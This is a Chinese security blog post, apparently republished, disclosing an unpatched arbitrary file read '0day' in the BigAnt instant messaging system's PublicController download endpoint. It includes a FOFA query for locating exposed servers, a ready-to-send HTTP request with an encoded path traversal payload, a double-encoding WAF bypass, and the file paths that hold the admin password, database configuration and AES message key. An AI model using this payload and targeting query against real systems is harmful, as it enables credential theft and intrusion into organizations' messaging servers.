文章总结： 文档披露了大蚂蚁即时通讯系统PublicController接口存在任意文件读取漏洞，影响5.5.x至最新6.0.1版本。攻击者利用ThinkPHP路由特性与双重URL编码可绕过限制读取系统敏感文件，如管理员密码、数据库配置及AES密钥，造成严重信息泄露。内容包含FOFA语法、漏洞复现详情及具体利用载荷，具有较高实战价值。 综合评分： 89 文章分类： 漏洞分析,漏洞POC,WEB安全,实战经验

【0day】大蚂蚁 (BigAnt) 即时通讯系统 PublicController 任意文件读取漏洞

0day收割机

2026年2月25日 14:36 山东

漏洞简介

杭州九麒科技大蚂蚁 (BigAnt) 即时通讯系统是一款企业级IM通信管理系统，提供多种功能支持。该系统的 PublicController download 接口存在任意文件读取/下载漏洞，攻击者可以通过特殊的参数绕过系统限制，读取系统上任意文件内容，造成敏感内容泄露或为进一步攻击做准备。

影响版本

BigAnt 5.5.x 及以上版本用户

经过测试，最新版本 6.0.1.20250407.1 也受影响

fofa语法

(body=”/Public/static/admin/admin_common.js” && body=”/Public/lang/zh-cn.js.js”) || title=”即时通讯 系统登录” && body=”/Public/static/ukey/Syunew3.js”

漏洞复现

需要注意thinkphp的路由特性，不区分大小写，且还支持如下等方式

/Admin/Public/download.html

/Admin/Public/download

GET /?m=Admin&c=Public&a=download&file=%2f%2e%2e%2e%2e%2f%2f%69%6e%73%74%61%6c%6c%2e%63%6d%64&name=README.txt HTTP/1.1
Host:
Cookie: PHPSESSID=xxxxx

成功读取到web根目录上一级目录下的 install.cmd文件内容。

因为$file = urldecode($file);的存在，我们还可以双重url编码参数file,达到bypass部分垃圾waf.

或者读取其他敏感文件如/Runtime/Data/ms_admin.php 它包含当前系统用户admin的密码

或者 installData.php ，包含系统数据库配置信息

或者 msg_encrypt_key.php 包含消息、文件解密aes密钥

仅供安全研究和学习使用。若因传播、利用本文档信息而产生任何直接或间接的后果或损害，均由使用者自行承担，文章作者不为此承担任何责任。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：0day收割机 《【0day】大蚂蚁 (BigAnt) 即时通讯系统 PublicController 任意文件读取漏洞》